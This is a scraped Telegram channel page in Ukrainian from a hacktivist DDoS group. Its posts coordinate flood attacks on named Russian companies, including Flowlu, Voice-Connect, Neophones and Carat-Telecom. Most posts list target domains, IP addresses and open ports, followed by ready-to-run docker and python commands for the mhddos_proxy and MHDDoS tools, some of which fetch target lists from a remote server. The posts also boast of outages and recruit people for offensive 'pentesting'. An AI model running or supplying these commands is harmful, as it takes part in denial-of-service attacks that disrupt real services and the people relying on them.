dd0sa2 | Unsorted

Telegram-канал dd0sa2 - Гайдамаки InfoDDoS-2

205

Subscribe to a channel

Гайдамаки InfoDDoS-2

Доброго дня, Гайдамаки!

Ми вирішили, що ці 4 канали не потрібні, тому через кілька днів їх буде видалено..😓

Причина проста: всі цілі і пости просто дублюються сюди, виникає питання — чому б вам не брати таргети на пряму з основного каналу? Ось і ми так подумали, тому всім активним учасникам прошу перейти на основний канал, лінк нижче:

/channel/haydamaki

Люблю, цілую — головний адмін❤️

Читать полностью…

Гайдамаки InfoDDoS-2

​​Доброго дня Гайдамаки!

Щодо наших перемог на кібер-фронті. Як і хлопці у ЗСУ, ми не даємо ворожим сис.адмінам навіть спокійно піти подивитись "Zомбо-ящик". Бідолаги змушені вдаватися до крайнощів.

Трішки про досягнення:
Сервіс Фертен два дні поспіль відчував себе, як я після весілля кума брата моєї сестри. Звісно вони намагалися вчинити певні дії по реабілітації, але, дивлячись на результат, можемо зробити висновок, що "Бетаргін" їм не допоміг. Тому поколошматили ми їх досить сильно.
Тим часом, ІТ армія орків сидить на березах, ловлячи останні Мб інтернету, ми знову оголошуємо кіновечір.
Так як Доктор Стрендж вже зайняв своє місце у складі Хмельницького ТРО, його на кіно-вечорі сьогодні не буде.
Тому пропонуємо вам запастися смаколиками та провести вечір за переглядом фільму "Сноуден"

Як і зазвичай, перегляд буде відбуватись у перерві між вибором цілей

ЗБІР СЬОГОДНІ 20:30

Читать полностью…

Гайдамаки InfoDDoS-2

Без коментарів.... Перша біржа вже лежить, тримаємо в такому прекрасному стані її далі, потім атака на іншу😉👌

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго дня, Гайдамаки!

Ми продовжуємо атакувати Северсталь та їх ресурси. Оголошую другу хвилю атаки!😈

84.38.185.177
[21/TCP, 22/TCP, 80/TCP, 9201/TCP]

217.175.24.21
217.175.24.112
217.175.24.189
217.175.24.192
217.175.24.94
[443/ssl-TCP]

217.175.23.3
217.175.23.4
217.175.18.117
13.80.145.65
217.175.25.190
[53/UDP] —> DNS-servers etc

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table


Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

Команди для MHDDoS:
python3 start.py UDP 217.175.23.3:53 5000 10000 true
python3 start.py UDP 217.175.23.4:53 5000 10000 true

python3 start.py UDP 217.175.18.117:53 5000 10000 true
python3 start.py UDP 13.80.145.65:53 5000 10000 true
python3 start.py UDP 217.175.25.190:53 5000 10000 true
Гайдамаки. До бою!⚔️

Читать полностью…

Гайдамаки InfoDDoS-2

Доброї ночі, гайдамаки!😴

Атака на флоулу була не дуже вдалою, так як там працють люди, які реально розбираються у своїй справі. Порти постійно фільтрували, але "елегантно" — вони відкриті, зі статусом tcpwrapped😓

На ніч, я вирішив дати не великий сервіс, так як вночі зазвичай активу мало — Вотбокс. Це телефонія, яка дає декільком компаніям свої віртуальні апі і звязок через систему CRM.

api.votbox.ru
www.votbox.ru
votbox.ru
www.virtualofficetools.ru
virtualofficetools.ru
telefononline.ru
84.52.103.122
[80/TCP, 443/TCP]
[25/STMPd, 110/POP3d, 143/IMAPd, 993/ssl-IMAPd, 995ssl-POP3d]
—> поштові канали звязку*

mx.virtualofficetools.ru
mx.votbox.ru
84.52.103.120
[443/TCP]

31.177.80.41
89.111.166.6
[53/UDP]
—> DNS-servers

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table


docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest http://www.votbox.ru http://www.votbox.ru/cloff.html http://www.votbox.ru/cloffback.html http://telefononline.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table

Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py http://www.votbox.ru http://www.votbox.ru/cloff.html http://www.votbox.ru/cloffback.html http://telefononline.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table

Команди для MHDDoS:
python3 start.py UDP 31.177.80.41:53 5000 10000 true
python3 start.py UDP 89.111.166.6:53 5000 10000 true

python3 start.py STRESS http://www.votbox.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://www.votbox.ru/cloff.html 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://www.votbox.ru/cloffback.html 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://telefononline.ru 6 1000 proxy.txt 10000 5000 true

Всі ми стомились останнім часом.. Війна все "попаскудила" всім, але не час здаватись, потрібно показати оркам, що вони зробили велику помилку👊

Читать полностью…

Гайдамаки InfoDDoS-2

​​Доброго дня, Гайдамаки!❤️

Як бачимо, сервери Фловлу не витримують навантаження, тому продовжуємо атаку. Кожних пів годинки я буду моніторити порти і айпі, якщо буде зміна якась - одразу ж дам знати, щоб ми атакували ефективно.

Також хочеться сказати, що паралельно йде атака на сервіси 1С, що нагнітає обстановку ще більше😉

Зараз прошу реально підключати всі можливі ресурси, оскільки ціль у пріорітеті!

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго ранку, Гайдамаки!⚔️

Сьогодні атакуємо вже сервіси Фловлу. Це сервіс-органайзер для бізнес планування. Він складається з різних "боксів", які виконують певні функції — синхронізація заміток, канали пошти, синзронізація з різними онлайн-гаманцями, планування подій, архіви для файлів і ще багато різних ніштяків😏

Важливі порти для атаки — поштові. Як я вже казав в попередньому пості: "Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід"

flowlu.ru
www.flowlu.ru
178.170.244.102
[21/TCP, 22/TCP, 80/TCP]
[25/TCP
, 110/TCP, 143/TCP, 465/TCP, 587/TCP, 993/TCP, 995/TCP] —> Dovecot mail-ports (поштові канали звязку)*

mx.flowlu.ru
95.213.248.77 —> висить їх БД
[22/TCP, 3306/TCP, 9100/TCP, 9998/TCP]

legal.flowlu.ru
complitech.flowlu.ru
artgorka.flowlu.ru
acorn.flowlu.ru
labx.flowlu.ru
hc.flowlu.ru
flamingo.flowlu.ru
ironplastgroup.flowlu.ru
relgroup.flowlu.ru
ginoice.flowlu.ru
ronavi.flowlu.ru
pipe.flowlu.ru
my.flowlu.ru
trustyhost.flowlu.ru
37.200.70.155
[22/TCP, 25/TCP]

DNS-servers:
ns1 —> 31.177.80.41 [53/UDP]
ns2 —> 89.111.166.6 [53/UDP]

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table


Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table


Команди для MHDDoS:
python3 start.py UDP 31.177.80.41:53 5000 10000 true
python3 start.py UDP 89.111.166.6:53 5000 10000 true

python3 start.py POST 95.213.248.77:3306 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.213.248.77:9100 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.213.248.77:9998 6 1000 proxy.txt 10000 10000 true

python3 start.py STRESS https://flowlu.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.flowlu.ru/register 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/services/tasks/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/prices/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/blog/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://178.170.244.102/phpmyadmin/ 6 1000 proxy.txt 10000 5000 true
Сервіс доволі вразливий, одразу видно, що його не атакували взагалі. Що ж, потрібно виправляти😊

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго дня, Гайдамаки!😊

Продовжуємо завдавати удару ворогам на кіберфронті. Вчора ми змогли різким ударом повалити сайти Неофонс-телефонії. Молодці!❤️

Наша ціль на зараз — та ж сама, але, оскільки вони почали масово закривати порти на основних айпі, було проведено додаткову розвідку і виявлено кілька поштових айпі з відкритими портами.
Доповнюю основну ціль, результат тримайте нижче.

neophones.ru
neocomms.ru
www.neocomms.ru
www.neophones.ru
83.166.225.198 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*

wiki.neophones.ru
217.150.199.10 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)

MAIL-servers:
217.150.193.196
[110/TCP, 143/TCP, 993/TCP, 995/TCP]

83.166.225.200
[25/TCP]

DNS-servers:
217.150.192.194
217.150.193.194
[53/UDP(open)]

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
Прошу атакувати командою вище - атака по вразливих портах***

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table

Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
Прошу атакувати командою вище - атака по вразливих портах***

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table

Команди для MHDDoS:
python3 start.py UDP 217.150.192.194:53 5000 10000 true
python3 start.py UDP 217.150.193.194:53 5000 10000 true

python3 start.py STRESS https://neophones.ru/utm5/connect_master 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/payment 6 1000 proxy.txt 10000 5000 true

python3 start.py STRESS https://neocomms.ru/contacts 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neophones.ru/tariffs 6 1000 proxy.txt 10000 5000 true

Update: 19:42 —> атакуємо поштові айпі, саме зараз вони відкрили знову порти, тому ЗАРАЗ важливо атакувати саме командою TCP**

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго вечора, Гайдамаки!

Наша ціль на зараз — та ж сама, але, оскільки вони почали масово закривати порти на основних айпі, було проведено додаткову розвідку і виявлено кілька поштових айпі з відкритими портами.
Доповнюю основну ціль, результат тримайте нижче.

neophones.ru
neocomms.ru
www.neocomms.ru
www.neophones.ru
83.166.225.198 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*

wiki.neophones.ru
217.150.199.10 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*

MAIL-servers:
217.150.193.196
[110/TCP(filtered), 143/TCP(filtered), 993/TCP(filtered), 995/TCP(filtered)] —> гади почали фільтрувати порти, по тсп не атакуємо**

83.166.225.200
[25/TCP]
—> все ще відкритий, атаку по тсп можна робити*

DNS-servers:
217.150.192.194
217.150.193.194
[53/UDP]
—> все ще відкриті, атаку по юдп не припиняємо*

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table


docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table

Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table

Команди для MHDDoS:
python3 start.py UDP 217.150.192.194:53 5000 10000 true
python3 start.py UDP 217.150.193.194:53 5000 10000 true

python3 start.py STRESS https://neophones.ru/utm5/connect_master 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/payment 6 1000 proxy.txt 10000 5000 true

python3 start.py STRESS https://neocomms.ru/contacts 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neophones.ru/tariffs 6 1000 proxy.txt 10000 5000 true

Update: 22:36 —> почали фільтрувати майже всі вразливі порти тсп, тому стараємось зараз сконцентруватись на юдп і атаках по юрл**

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго дня, Гайдамаки!😊

Продовжуємо завдавати удару ворогам на кіберфронті. Вчора ми змогли різким ударом повалити сайти Неофонс-телефонії. Молодці!❤️

Наша ціль на зараз — та ж сама, але, оскільки вони почали масово закривати порти на основних айпі, було проведено додаткову розвідку і виявлено кілька поштових айпі з відкритими портами.
Доповнюю основну ціль, результат тримайте нижче.

neophones.ru
neocomms.ru
www.neocomms.ru
www.neophones.ru
83.166.225.198 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*

wiki.neophones.ru
217.150.199.10 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*

MAIL-servers:
217.150.193.196
[110/TCP(filtered), 143/TCP(filtered), 993/TCP(filtered), 995/TCP(filtered)] —> гади почали фільтрувати порти, по тсп не атакуємо**

83.166.225.200
[25/TCP] —> все ще відкритий, атаку по тсп можна робити*

DNS-servers:
217.150.192.194
217.150.193.194
[53/UDP] —> все ще відкриті, атаку по юдп не припиняємо*

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table

Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table

Команди для MHDDoS:
python3 start.py UDP 217.150.192.194:53 5000 10000 true
python3 start.py UDP 217.150.193.194:53 5000 10000 true

python3 start.py STRESS https://neophones.ru/utm5/connect_master 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/payment 6 1000 proxy.txt 10000 5000 true

python3 start.py STRESS https://neocomms.ru/contacts 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neophones.ru/tariffs 6 1000 proxy.txt 10000 5000 true

Update: 22:36 —> почали фільтрувати майже всі вразливі порти тсп, тому стараємось зараз сконцентруватись на юдп і атаках по юрл**

Читать полностью…

Гайдамаки InfoDDoS-2

Доброї ночі, гайдамаки!💪

Сьогодні ми продовжили атакувати войс-конект, тримаємо всіма силами, як можемо. Скажу так, в них зараз почалась паніка - через те, що система не справляється з навантаженням, тому мінімум ще один день ми їх помучимо😈👌

Також я написав їм в техпідтримку - мені відповіли, що в них "небольшие проблемы", і що їх команда "спеціалістів", активно працює над цим. Бачу, що не дуже добре працює, так як сервіс вже лежить три дні підряд🧐👍

З технічної точки зору скажу так, БД вони не можуть відновити. Тому що, як тільки відкривають порти і хочуть запустити сервіс, ми одразу ж їх валимо, без шансів. Єдине, що в них працює (з перебоями постійно і з помилками 500), це домашня сторінка. Але вона не важлива, без доступу до сторінки входу і реєстрації в особистий кабінет клієнтів😉

Тому продовжуємо давити окупантів. Війна вже набридла нам, хочеться миру, і в Росії люди повинні це зрозуміти вже...

Читать полностью…

Гайдамаки InfoDDoS-2

Доброї ночі, Гайдамаки!

По таргетам: продовжуємо атаку на войс конект, бо їм дуже погано стає вже, ситуація накаляється. Через годину кину оновлений таргет, для додаткової атаки.

Також хочу поширити серед вас форму. Ми спільно з іншими групами вирішили створити команду пентестерів. Нам потрібні люди, які добре знаються в компютерних мережах:

– Знаходишся у IT-сфері, і хочеш допомогти нашій країні своїми навичками.
– Знайомий з вірусами/пентестом на “ти” і маєш вільний час для його використання.
– Працював у IT-компаніях Middle/Senior-розробником будь-якого калібру.

Якщо ви один і з таких, тоді прошу сюди:
https://cyberarmy.com.ua/?page_id=6863

Читать полностью…

Гайдамаки InfoDDoS-2

Гайдамаки, доброго ранку! Зараз увага!!!

Войс-конект почали активно працювати над захистом своїх систем. Перший їх крок — це підвязка нової айпі для БД (ближче до 5 ранку), щоб розподілити навантаження на їх систему, також невеличка зміна в портах, що ж, гайдамаки не сплять, тому їм буде не солодко. Добавляю внизу оновлений таргет👌

185.248.100.60
[22/TCP, 25/TCP, 111/TCP, 443/TCP]
[123/UDP open]
—> синхронізація часу, не дуже важливо, але додатково зафлудити можна*

77.244.214.121
[22/TCP, 25/TCP, 443/TCP]

95.163.87.128 —> висить їх БД*
[22/TCP, 1720/TCP, 5060/TCP]
[123/UDP open|filtered] —> синхронізація часу, не дуже важливо, але додатково зафлудити можна*

95.163.87.125 —> підвязують сюди свою базу даних, яку ми положили*
[22/TCP, 1720/TCP, 3306/TCP]
[389/UDP, 5000/UDP, 5060/UDP]
—> не на довго відкриті юдп порти, швидше за все для налаштування нової БД*

Команда для Docker:

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
(рекомендую зараз атакувати саме командою вище)*
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://www.voice-connect.ru https://voice-connect.ru https://my.voice-connect.ru http://billing.voice-connect.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS POST --table

Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
(рекомендую зараз атакувати саме командою вище)*
python runner.py https://www.voice-connect.ru https://voice-connect.ru https://my.voice-connect.ru http://billing.voice-connect.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS POST --table

Команди для MHDDoS:
python3 start.py UDP 185.248.100.60:123 5000 10000 true
python3 start.py UDP 95.163.87.125:389 5000 10000 true
python3 start.py UDP 95.163.87.125:5000 5000 10000 true
python3 start.py UDP 95.163.87.125:5060 5000 10000 true
python3 start.py POST 95.163.87.125:3306 6 1000 proxy.txt 10000 10000 true
(вище вказав пріорітетні команди для MHDDoS)*
python3 start.py STRESS https://www.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://billing.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.voice-connect.ru 6 1000 proxy.txt 10000 5000 true

python3 start.py POST 3185.248.100.60:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:443 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:111 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:25 6 1000 proxy.txt 10000 10000 true

python3 start.py POST 77.244.214.121:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 77.244.214.121:25 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 77.244.214.121:443 6 1000 proxy.txt 10000 10000 true

python3 start.py POST 95.163.87.128:1720 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:5060 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:22 6 1000 proxy.txt 10000 10000 true

python3 start.py POST 95.163.87.125:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.125:1720 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.125:3306 6 1000 proxy.txt 10000 10000 true
Давим, давим, і ще раз давим рашистів😤

Update: 06:18

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго вечора, гайдамаки!☺️

Наша нічна ціль на сьогодні – доволі популярна в Росії бізнес-компанія телефонії рашистів, а саме Войс-конект. Ціль складна, але я вірю в наші сили))

Спробуємо повалити, якщо вийде, будемо тримати кілька днів. Тому що останнім часом ми як голодна акула, яка шукає поживи — поки не атакує нікого достатньо довго, щоб загнати жертву в пастку😈
Всім гарно повеселитись!

www.voice-connect.ru
voice-connect.ru
my.voice-connect.ru
billing.voice-connect.ru

185.248.100.60
[22/TCP, 25/TCP, 80/TCP, 111/TCP, 443/TCP]
[123/UDP]
—> синхронізація часу, не дуже важливо, але додатково зафлудити можна*

195.88.209.73
[22/TCP, 443/TCP, 8088/TCP]

77.244.214.121
[22/TCP, 25/TCP, 80/TCP, 443/TCP]

95.163.87.128
[22/TCP, 80/TCP, 443/TCP, 1720/TCP, 3306/TCP, 5060/TCP]
[123/UDP]
—> синхронізація часу, не дуже важливо, але додатково зафлудити можна*

Команда для Docker:

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://www.voice-connect.ru https://voice-connect.ru https://my.voice-connect.ru http://billing.voice-connect.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS POST --table

Команда для mhddos_proxy:

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py https://www.voice-connect.ru https://voice-connect.ru https://my.voice-connect.ru http://billing.voice-connect.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS POST --table

Команди для MHDDoS:
python3 start.py STRESS https://www.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://billing.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.voice-connect.ru 6 1000 proxy.txt 10000 5000 true

python3 start.py UDP 95.163.87.128:53 5000 10000 true
python3 start.py UDP 185.248.100.60:53 5000 10000 true

python3 start.py POST 3185.248.100.60:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:443 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:111 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:25 6 1000 proxy.txt 10000 10000 true

python3 start.py POST 77.244.214.121:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 77.244.214.121:25 6 1000 proxy.txt 10000 10000 true

python3 start.py POST 95.163.87.128:1720 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:1720 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:22 6 1000 proxy.txt 10000 10000 true

python3 start.py POST 195.88.209.73:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 195.88.209.73:8080 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 195.88.209.73:443 6 1000 proxy.txt 10000 10000 true
Гайдамаки до бою! Потрібно багато атак одночасно за короткий проміжок часу😊

Update 23:05 —> затримав пост на годину, потрібно було зробити додаткову розвідку по цілі**

Читать полностью…

Гайдамаки InfoDDoS-2

Доброї ночі, Гайдамаки!😴

Сьогодні було влаштовано масштабну атаку на сервери сбербанку, але ця атака дала ефект лише на короткий час, саме напочатку, коли ще порти були відкриті. В основному це дало тимчасові незручності і все. Систему банку знищити не так просто, тому переходимо до наступної цілі..

Продовжуємо по традиції наші рейди на бізнес-телефонії рашистів. Третя хвиля атаки Гайдамаків!!! Цього разу я обрав доволі слабкий ресурс(вночі трафік атаки малий доволі), а саме карат-телеком. Цікаво те, що в інсайдтел зараз ребрендинг і вони інтегрували свої ресурси під карат, а це означає, що ми одним пострілом вбємо два зайці.😁

www.carat-telecom.ru
carat-telecom.ru
31.31.196.124
[21/TCP(filtered), 22/TCP(filtered), 25/TCP(filtered), 110/TCP(filtered), 111/TCP(filtered), 143/TCP(filtered), 465/TCP(filtered), 993/TCP(filtered), 995/TCP(filtered), 3306/TCP(filtered)]
[53/UDP(open|filtered)
]

ce.insidetel.com
195.211.30.51
[1723/TCP(filtered), 5060/TCP(filtered)]

lk.carat-telecom.ru
78.109.112.43
[1723/TCP(filtered), 2345/TCP(filtered), 5060/TCP(filtered)]

Команда для Docker:

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://www.carat-telecom.ru https://carat-telecom.ru http://ce.insidetel.com https://lk.carat-telecom.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 3000 --rpc 1000 --table
(не рекомендую зараз)*

Команда для mhddos_proxy:
python runner.py https://www.carat-telecom.ru https://carat-telecom.ru http://ce.insidetel.com https://lk.carat-telecom.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS --table

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1200 -p 3000 --rpc 1000 --table
(не рекомендую зараз)*

Команди для MHDDoS:

python3 start.py STRESS https://www.carat-telecom.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://carat-telecom.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://ce.insidetel.com 6 1000 proxy.txt 10000 5000 true
